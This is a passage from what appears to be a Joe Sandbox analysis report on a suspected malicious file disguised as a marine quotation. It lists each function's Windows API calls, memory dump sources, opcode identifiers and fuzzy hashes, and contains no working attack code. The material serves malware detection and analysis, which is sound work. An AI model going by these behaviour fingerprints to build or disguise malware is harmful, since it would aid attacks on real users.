                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: c0c3bf3f227dce81e1922cdecbde1ad0d65cfcda22eaeacc183f030515827d2e
                                                                            • Instruction ID: cf94f50da91627dcf7eac0d7216ede849df9e0c44ddaf5408eae97f73bb2742d
                                                                            • Opcode Fuzzy Hash: c0c3bf3f227dce81e1922cdecbde1ad0d65cfcda22eaeacc183f030515827d2e
                                                                            • Instruction Fuzzy Hash: 6E311230644256EFDB20DF18DCA4FA537E2EB8A720F1541A8FA04EB2B1CB71A8409B40
                                                                            Function 00697726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00697769
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0069778F
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00697792
                                                                            • SysAllocString.OLEAUT32(?), ref: 006977B0
                                                                            • SysFreeString.OLEAUT32(?), ref: 006977B9
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006977DE
                                                                            • SysAllocString.OLEAUT32(?), ref: 006977EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 54de7f1948970acf103d933ffc6c6729505e5c095fa8d65c3dab19a6d723ec58
                                                                            • Instruction ID: e540ec056a30c53b76db281dfec17a50c06341d9f771a2e1ff3713b4d382d224
                                                                            • Opcode Fuzzy Hash: 54de7f1948970acf103d933ffc6c6729505e5c095fa8d65c3dab19a6d723ec58
                                                                            • Instruction Fuzzy Hash: 81219076614219AFDF10DFA9CC88CFB77EEEB097647048025FA19DB260D670DC428764
                                                                            Function 006977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00697842
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00697868
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0069786B
                                                                            • SysAllocString.OLEAUT32 ref: 0069788C
                                                                            • SysFreeString.OLEAUT32 ref: 00697895
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006978AF
                                                                            • SysAllocString.OLEAUT32(?), ref: 006978BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 9277daa6e2d64538471292054b8c08f80611af4272be4d3cd97691436d4f15df
                                                                            • Instruction ID: 51a949106dcf3d48006ccaee966d6270df876530fb7625ad6772c66c5002abbf
                                                                            • Opcode Fuzzy Hash: 9277daa6e2d64538471292054b8c08f80611af4272be4d3cd97691436d4f15df
                                                                            • Instruction Fuzzy Hash: D9216D31618204AFDF10AFA8DD88DBA77EEEB097607148135F915CB6A1DA70DC41CB64
                                                                            Function 006A04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 006A04F2
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006A052E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: 5f3e948519c3595557d64c93c442404c417648f5f5876888ef8912540cb4cfbb
                                                                            • Instruction ID: 539ffce12801f324f5b7b6424206b821de2018c5d84199edecf348f850a6442c
                                                                            • Opcode Fuzzy Hash: 5f3e948519c3595557d64c93c442404c417648f5f5876888ef8912540cb4cfbb
                                                                            • Instruction Fuzzy Hash: 9021A2709003059FEF20AF29DD04AAA7BB6AF46764F204A18F8A1D22E0D7709D40CF20
                                                                            Function 006A05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 006A05C6
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006A0601
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: 499346446244118eedad5688768451772580032636a73f2fa4d2c3d3cb589fad
                                                                            • Instruction ID: ba31994ef18e0d26a02a81f4318494c6fee7e49f3d1d90b87699c1fd8be85a0d
                                                                            • Opcode Fuzzy Hash: 499346446244118eedad5688768451772580032636a73f2fa4d2c3d3cb589fad
                                                                            • Instruction Fuzzy Hash: 9C2153755003059BEB20AF69DC04EAA77E6BF96734F201A19F9A1E72D0D7709D61CF10
                                                                            Function 006C40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0063600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0063604C
                                                                              • Part of subcall function 0063600E: GetStockObject.GDI32(00000011), ref: 00636060
                                                                              • Part of subcall function 0063600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063606A
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006C4112
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006C411F
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006C412A
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006C4139
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006C4145
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            • Opcode ID: 560de40bf705cb79d003f88fc7c655ce3a7fc5e650142f5a1104d5dd15b90393
                                                                            • Instruction ID: ef84000ba22a23cfe70ff1147e807a34a0bb0ab34494c6ff1efe8d5a1824428b
                                                                            • Opcode Fuzzy Hash: 560de40bf705cb79d003f88fc7c655ce3a7fc5e650142f5a1104d5dd15b90393
                                                                            • Instruction Fuzzy Hash: 5A1193B1140119BEEF118F64CC85EF77F9EEF08798F014111FA18A2150CA769C21DBA4
                                                                            Function 006534CD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: api-ms-$ext-ms-
                                                                            • API String ID: 0-537541572
                                                                            • Opcode ID: 6f3bc55d1511ffcef1ecdc05aeecd060befaecdefb992aba08aeb18c089e552b
                                                                            • Instruction ID: 51093ea9b1a18083c60ec6af688c6d40703c9b8b9a752e77f34fa318ca4ed354
                                                                            • Opcode Fuzzy Hash: 6f3bc55d1511ffcef1ecdc05aeecd060befaecdefb992aba08aeb18c089e552b
                                                                            • Instruction Fuzzy Hash: 3411D871E05331ABDB224B28DC80B6A77579B01FE1F156224ED06A7391F630EF09C6E0
                                                                            Function 0069DE27 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 348263315-3771769585
                                                                            • Opcode ID: 735a9afe350c8dadf6db5aa92cc5b6d3605c5cc137cdf570fa624b246b8747cc
                                                                            • Instruction ID: 7c000348254053af0c725491c7d57f20c62d5c33e20cae30be1020a73dbe1af3
                                                                            • Opcode Fuzzy Hash: 735a9afe350c8dadf6db5aa92cc5b6d3605c5cc137cdf570fa624b246b8747cc
                                                                            • Instruction Fuzzy Hash: 8F112671904109AFCF60AB64DC4AEFF77AEDF10761F0101BDF509AA191EF71CA818A64
                                                                            Function 0069DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0069DA74
                                                                            • LoadStringW.USER32(00000000), ref: 0069DA7B
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0069DA91
                                                                            • LoadStringW.USER32(00000000), ref: 0069DA98
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0069DADC
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0069DAB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 4072794657-3128320259
                                                                            • Opcode ID: fb6924840cfd3bbd1395ca0cca18ea532f279d862c1826664c41b32831be6312
                                                                            • Instruction ID: 940bbd5a71df34d43ac54c612a2e50c09ef76ef1204991dcc6329b49427b1d27
                                                                            • Opcode Fuzzy Hash: fb6924840cfd3bbd1395ca0cca18ea532f279d862c1826664c41b32831be6312
                                                                            • Instruction Fuzzy Hash: 950186F25002087FEB10ABA4DD89EF7376DE708311F4054A6F74AE2141EA749E854F74
                                                                            Function 006A096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(00DBE4E0,00DBE4E0), ref: 006A097B
                                                                            • EnterCriticalSection.KERNEL32(00DBE4C0,00000000), ref: 006A098D
                                                                            • TerminateThread.KERNEL32(0055002D,000001F6), ref: 006A099B
                                                                            • WaitForSingleObject.KERNEL32(0055002D,000003E8), ref: 006A09A9
                                                                            • CloseHandle.KERNEL32(0055002D), ref: 006A09B8
                                                                            • InterlockedExchange.KERNEL32(00DBE4E0,000001F6), ref: 006A09C8
                                                                            • LeaveCriticalSection.KERNEL32(00DBE4C0), ref: 006A09CF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 95b61838fd2cae543868a3728cf7dd86e971ea0f80af8f915104836abc60f511
                                                                            • Instruction ID: 6b806664754e569718a831f88984e32a31566db31b7c42bf2ed292a726625780
                                                                            • Opcode Fuzzy Hash: 95b61838fd2cae543868a3728cf7dd86e971ea0f80af8f915104836abc60f511
                                                                            • Instruction Fuzzy Hash: 9AF01D31442902ABE7415B94EE88EE6BA26FF01712F403015F105908A0C7749965DF90
                                                                            Function 00635D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 00635D30
                                                                            • GetWindowRect.USER32(?,?), ref: 00635D71
                                                                            • ScreenToClient.USER32(?,?), ref: 00635D99
                                                                            • GetClientRect.USER32(?,?), ref: 00635ED7
                                                                            • GetWindowRect.USER32(?,?), ref: 00635EF8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: 9c0d3345a64a6d0f49a824b6b3bb10bbd82a343cc3da7f7847379e0dcd6a81d3
                                                                            • Instruction ID: cd41b90beb72414225866b8d9738002a0c7d2841a6c95fd59367474c107f3ee7
                                                                            • Opcode Fuzzy Hash: 9c0d3345a64a6d0f49a824b6b3bb10bbd82a343cc3da7f7847379e0dcd6a81d3
                                                                            • Instruction Fuzzy Hash: 00B16835A0074ADBDB10CFA9C4847EAB7F2FF48310F14941AE8AAD7250DB34EA51DB94
                                                                            Function 006C20FD Relevance: 9.2, APIs: 6, Instructions: 196windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenu.USER32(?), ref: 006C2183
                                                                            • GetMenuItemCount.USER32(00000000), ref: 006C21B5
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006C21DD
                                                                            • GetMenuItemID.USER32(?,?), ref: 006C224D
                                                                            • GetSubMenu.USER32(?,?), ref: 006C225B
                                                                              • Part of subcall function 00693A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00693A57
                                                                              • Part of subcall function 00693A3D: GetCurrentThreadId.KERNEL32 ref: 00693A5E
                                                                              • Part of subcall function 00693A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006925B3), ref: 00693A65
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006C22E3
                                                                              • Part of subcall function 0069E97B: Sleep.KERNEL32 ref: 0069E9F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow
                                                                            • String ID:
                                                                            • API String ID: 2039446747-0
                                                                            • Opcode ID: 750415ea3755ac6ccaa33e8692b66e15965e77d1467ea3e6b637f84903dd835c
                                                                            • Instruction ID: 3fa1aab453883d1625762fdbe870ccda472b6a251c79a5a2048999f6ebb9af0e
                                                                            • Opcode Fuzzy Hash: 750415ea3755ac6ccaa33e8692b66e15965e77d1467ea3e6b637f84903dd835c
                                                                            • Instruction Fuzzy Hash: 6B716D75A00216AFCB54EF64C851EBEB7F6EF88320F14845DE916AB341DB34EE418B90
                                                                            Function 006BBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BBCCA
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006BBD25
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BBD6A
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006BBD99
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006BBDF3
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BBDFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                            • String ID:
                                                                            • API String ID: 3451389628-0
                                                                            • Opcode ID: 109f896596997c27ca734264328bd808a7e05cdd5d7c1bedb7858197cec22373
                                                                            • Instruction ID: 91acd81dd61a7aafbde48269fe35c0ae7c6c276690f4f132c1760f29b0e0f486
                                                                            • Opcode Fuzzy Hash: 109f896596997c27ca734264328bd808a7e05cdd5d7c1bedb7858197cec22373
                                                                            • Instruction Fuzzy Hash: 3F81C270208241EFD714DF24C891EAABBE6FF84318F14995CF4994B2A2CB71ED45CB92
                                                                            Function 0068F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000035), ref: 0068F7B9
                                                                            • SysAllocString.OLEAUT32(00000001), ref: 0068F860
                                                                            • VariantCopy.OLEAUT32(0068FA64,00000000), ref: 0068F889
                                                                            • VariantClear.OLEAUT32(0068FA64), ref: 0068F8AD
                                                                            • VariantCopy.OLEAUT32(0068FA64,00000000), ref: 0068F8B1
                                                                            • VariantClear.OLEAUT32(?), ref: 0068F8BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                            • String ID:
                                                                            • API String ID: 3859894641-0
                                                                            • Opcode ID: 7e69d703b04f3d063b6a2898e4e3a5f7ecb2aa869b9d227084843c10298ef643
                                                                            • Instruction ID: 744674723c02424d745db3d2df41f69d99708f45af861770ae7bb5e2c168743e
                                                                            • Opcode Fuzzy Hash: 7e69d703b04f3d063b6a2898e4e3a5f7ecb2aa869b9d227084843c10298ef643
                                                                            • Instruction Fuzzy Hash: 2D51B731A00310BACF64BF65D895B69B3E7EF45310F24956BE905EF291DB708C41CBAA
                                                                            Function 0064920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • BeginPaint.USER32(?,?,?), ref: 00649241
                                                                            • GetWindowRect.USER32(?,?), ref: 006492A5
                                                                            • ScreenToClient.USER32(?,?), ref: 006492C2
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006492D3
                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00649321
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006871EA
                                                                              • Part of subcall function 00649339: BeginPath.GDI32(00000000), ref: 00649357
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 3050599898-0
                                                                            • Opcode ID: 5c033eca0e0f4abf6b6898d88fb37703c1f93876195a1cf9357913b604c96b2a
                                                                            • Instruction ID: bda3ec896babdc9ba1d21f1daf805be0366f72daa07c9b6374aad90e90ccbae0
